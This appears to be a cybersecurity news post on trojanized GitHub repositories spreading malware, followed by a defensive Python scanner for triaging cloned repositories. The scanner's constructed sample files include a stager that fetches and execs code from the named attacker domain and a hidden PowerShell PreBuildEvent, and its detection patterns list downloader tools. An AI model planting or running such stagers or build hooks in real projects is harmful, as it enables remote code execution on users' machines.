
Trojanized GitHub Repositories Used to Spread Malware in New Campaign

Cybersecurity researchers have uncovered a new malware distribution campaign leveraging GitHub repositories to spread trojanized hacking tools

CYBER SYRUP
Delivering the sweetest insights on cybersecurity.


Cybersecurity researchers have uncovered a new malware distribution campaign that uses GitHub repositories to spread trojanized hacking tools. Dubbed "Banana Squad" by ReversingLabs, the operation is a continuation of a 2023 campaign against the Python Package Index (PyPI), in which malicious packages were downloaded more than 75,000 times.

This time the focus has shifted to GitHub. Researchers found 67 repositories posing as popular Python-based hacking tools, such as account checkers or game cheats, that deliver malware-laced payloads instead of the promised functionality.

How the Campaign Works

These malicious repositories impersonate legitimate software such as Discord account cleaners, TikTok username checkers, Fortnite cheats, and even cryptocurrency tools. Once a victim downloads and runs one of these tools, it kicks off a multi-stage malware chain that includes:

  • Initial Python scripts that download additional payloads.

  • Injection of malicious code into applications like the Exodus crypto wallet.

  • Exfiltration of sensitive data to attacker-controlled servers such as dieserbenni[.]ru.

All 67 repositories identified in this campaign have since been taken down by GitHub.

A Growing Trend: GitHub as a Malware Distribution Hub

This isn't an isolated case. GitHub is increasingly being abused by threat actors as a malware delivery vector.

  • Trend Micro recently uncovered 76 malicious repositories run by a group named Water Curse, spreading credential stealers and RATs.

  • Check Point exposed a criminal distribution network called the Stargazers Ghost Network, which uses GitHub stars and forks to give legitimacy to malware-laden repositories.

These fake repositories often mimic real open-source tools or game-related utilities, preying on unsuspecting users looking for free cheats or utilities.

Targeting Inexperienced Cybercriminals and Gamers

Sophos recently revealed a similar campaign that backdoored a repository for Sakura-RAT, tricking aspiring cybercriminals into compiling and installing info-stealing malware. These backdoors were hidden in:

  • Python scripts

  • Visual Studio PreBuild events

  • JavaScript files

  • Screensaver (.scr) executables

Over 133 such repositories have been identified to date, suggesting a Distribution-as-a-Service (DaaS) model that has been operating since at least 2022.

Mitigation and Awareness

This growing abuse of GitHub underscores the need for:

  • Verifying the legitimacy of open-source tools before installation: check the maintainer's history and whether the repository is the project's canonical home, rather than trusting stars and forks, which the Stargazers Ghost Network case shows can be manufactured.

  • Avoiding unknown GitHub repositories shared via Discord, YouTube, or social media.

  • Scanning all scripts and executables with endpoint protection solutions, and reading project files before building them: a backdoor planted in a Visual Studio PreBuild event runs as soon as the project is compiled, before any resulting binary can be scanned.
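The following is an added example for this post, not tooling from ReversingLabs, Trend Micro, Check Point or Sophos. It implements the kind of static triage a practitioner would run on a freshly cloned repository before executing or building anything, covering the stages described under "How the Campaign Works" (Python stagers that decode and execute downloaded code, exfiltration to dieserbenni[.]ru) and the hiding places Sophos reported (Python scripts, Visual Studio PreBuild events, JavaScript, .scr executables). The regexes and thresholds are the example author's own heuristics; the sample repository it builds in a temporary directory is constructed for the demonstration, and the only real indicator in it is the exfiltration domain named in this article.

```python
"""Static triage of a cloned repository for the trojanization patterns
described in this post. Added example; not tooling from ReversingLabs,
Trend Micro, Check Point or Sophos. All heuristics and sample files are
the example author's constructions; the only real indicator used is the
exfiltration domain the article names."""
import base64
import re
import tempfile
from pathlib import Path

KNOWN_IOCS = {"dieserbenni.ru"}  # from the article; extend with your own feeds

# Python rules: every regex in the tuple must match somewhere in the file
# (stagers rarely keep decode and exec on the same line).
PY_RULES = {
    "b64-exec": (re.compile(r"b64decode"), re.compile(r"\b(exec|eval)\s*\(")),
    "download-exec": (re.compile(r"urlopen|requests\.get|urlretrieve"),
                      re.compile(r"\b(exec|eval)\s*\(|subprocess|os\.system")),
}
JS_RULES = {
    "atob-eval": (re.compile(r"\batob\s*\("), re.compile(r"\beval\s*\(")),
    "child-process": (re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"),),
}
# MSBuild pre/post-build events (.csproj/.vcxproj) that spawn a shell or downloader
BUILD_EVENT = re.compile(r"<(Pre|Post)BuildEvent>(.*?)</\1BuildEvent>", re.S | re.I)
BUILD_SUSPECT = re.compile(r"powershell|pwsh|cmd(\.exe)?\s*/c|curl\b|certutil|bitsadmin|mshta", re.I)
DOMAIN = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{20,}={0,2})['\"]")
PROJECT_EXT = {".csproj", ".vcxproj", ".vbproj"}


def _matches_all(rule, text):
    return all(r.search(text) for r in rule)


def scan_file(rel_name: str, text: str) -> list[str]:
    """Return human-readable findings for one file (empty list if clean)."""
    hits = []
    suffix = Path(rel_name).suffix.lower()
    if suffix == ".py":
        hits += [f"{rel_name}: {k}" for k, r in PY_RULES.items() if _matches_all(r, text)]
    elif suffix == ".js":
        hits += [f"{rel_name}: {k}" for k, r in JS_RULES.items() if _matches_all(r, text)]
    elif suffix in PROJECT_EXT:
        for m in BUILD_EVENT.finditer(text):
            if BUILD_SUSPECT.search(m.group(2)):
                hits.append(f"{rel_name}: suspicious {m.group(1)}BuildEvent")
    elif suffix == ".scr":
        hits.append(f"{rel_name}: screensaver executable (.scr) in source tree")
    # Known indicators in clear text, then inside base64 literals (a common
    # way stagers hide their second-stage URL from a casual grep).
    for d in {m.group(0).lower() for m in DOMAIN.finditer(text)} & KNOWN_IOCS:
        hits.append(f"{rel_name}: IOC {d}")
    for lit in B64_LITERAL.findall(text):
        try:
            decoded = base64.b64decode(lit, validate=True).decode("utf-8", "ignore")
        except ValueError:
            continue
        for d in {m.group(0).lower() for m in DOMAIN.finditer(decoded)} & KNOWN_IOCS:
            hits.append(f"{rel_name}: IOC {d} (base64-hidden)")
    return hits


def scan_repo(root: Path) -> list[str]:
    """Walk a cloned repository and collect findings, sorted for stable output."""
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        text = path.read_bytes().decode("utf-8", "ignore")
        findings += scan_file(path.relative_to(root).as_posix(), text)
    return sorted(findings)


def build_sample_repo(root: Path) -> None:
    """Constructed files imitating the article's patterns; not real samples."""
    stage2 = base64.b64encode(b"https://dieserbenni.ru/stage2").decode()
    (root / "checker.py").write_text(
        "import base64, urllib.request\n"
        f"STAGE2 = '{stage2}'\n"
        "exec(urllib.request.urlopen(base64.b64decode(STAGE2)).read())\n")
    (root / "Loader").mkdir()
    (root / "Loader" / "Loader.csproj").write_text(
        "<Project>\n  <PropertyGroup>\n"
        "    <PreBuildEvent>powershell -WindowStyle Hidden -File setup.ps1</PreBuildEvent>\n"
        "  </PropertyGroup>\n</Project>\n")
    (root / "ui").mkdir()
    (root / "ui" / "app.js").write_text(
        "const cp = require('child_process');\ncp.exec('./helper');\n")
    (root / "bin").mkdir()
    (root / "bin" / "update.scr").write_bytes(b"MZ\x90\x00")
    (root / "README.md").write_text("TikTok username checker. Run: python checker.py\n")


def demo() -> list[str]:
    """Build the constructed sample repository and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_repo(root)
        return scan_repo(root)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Run it against a real clone with `scan_repo(Path("path/to/clone"))`. A hit is a reason to read the file, not proof of malice: a legitimate installer may download and execute code too. The useful signal is the combination, such as a "game cheat" whose project file runs a hidden PowerShell script before the first compile, or a base64 literal that decodes to a domain on a threat-intel list.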

As trojanized development tools and game cheats grow more sophisticated, users must remain vigilant: a seemingly benign tool, downloaded from a repository with plenty of stars, can still carry a backdoor.